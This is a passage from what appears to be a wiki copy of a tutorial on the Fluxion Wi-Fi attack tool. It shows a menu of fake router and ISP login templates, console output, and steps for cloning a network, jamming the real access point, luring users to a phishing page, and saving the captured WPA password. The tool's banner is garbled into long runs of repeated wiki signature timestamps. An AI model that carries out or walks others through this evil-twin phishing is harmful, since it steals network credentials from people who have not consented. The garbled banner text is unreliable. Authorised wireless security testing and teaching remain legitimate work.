[25] Slovenian [SVN]
[26] Belkin [ENG]
[27] Netgear [ENG]
[28] Huawei [ENG]
[29] Verizon [ENG]
[30] Netgear [ESP]
[31] Arris [ESP]
[32] Vodafone [ESP]
[33] TP-Link [ENG]
[34] Ziggo [NL]
[35] KPN [NL]
[36] Zigoo2016 [NL]
[37] FRITZBOX_DE [DE]
[38] FRITZBOX_ENG [ENG]
[39] GENEXIS_DE [DE]
[40] Login-Netgear [Login-Netgear]
[41] Login-Xfinity [Login-Xfinity]
[42] Telekom
[43] Google
[44] MOVISTAR [ESP]
[45] Back
- ? 27
[15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)onnowpurbo (talk) 15:56, 3 October 2020 (+07)] [ ] [ FLUXION 2 < Fluxion Is The Future > ] [ ] [15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)onnowpurbo (talk) 15:56, 3 October 2020 (+07)]
[i] Attack in Progress ..
[1] Choose another network
[2] Exit
#>
The attack spawns multiple windows to create a cloned version of their wireless network while simultaneously jamming the common access point, enticing the user to join the identically named, but unencrypted, network.
Step 7Capture the Password
The user is directed to a fake login page, which is either convincing or not, depending on which you chose.
Perhaps not the most elegant deception, but these files are configurable.
Entering the wrong password will fail the handshake verification, and the user is prompted to try again. Upon entering the correct password, Aircrack-ng verifies and saves the password to a text file while displaying it on the screen. The user is directed to a "thank you" screen as the jamming ceases and the fake access point shuts down.
[15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)onnowpurbo (talk) 15:56, 3 October 2020 (+07)] [ ] [ FLUXION 2 < Fluxion Is The Future > ] [ ] [15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)onnowpurbo (talk) 15:56, 3 October 2020 (+07)]
[-] Cleaning and closing [-] Disabling monitoring interface mon0 [-] Disabling interface wlan1 [-] Disabling forwarding of packets [-] Cleaning iptables [-] Restoring tput [-] Delete files [-] Restarting Network-Manager [-] Cleanup performed successfully! [+] Thanks for using fluxion You can verify your success by checking the readout of the Aircrack-ng WiFi Information screen.
Congratulations, you've succeeded in obtaining and verifying a password, supplied by targeting the "wetware." You've tricked a user into entering the password rather than relying on a preexisting flaw with the security.
Warning: This Technique Could Be Illegal Without Permission Legally, Fluxion combines scanning, cloning, creating a fake AP, creating a phishing login screen, and using the Aircrack-ng script to obtain and crack WPA handshakes. As such, it leaves signatures in router logs consistent with using these techniques. Most of these practices are illegal and unwelcome on any system you don't have permission to audit.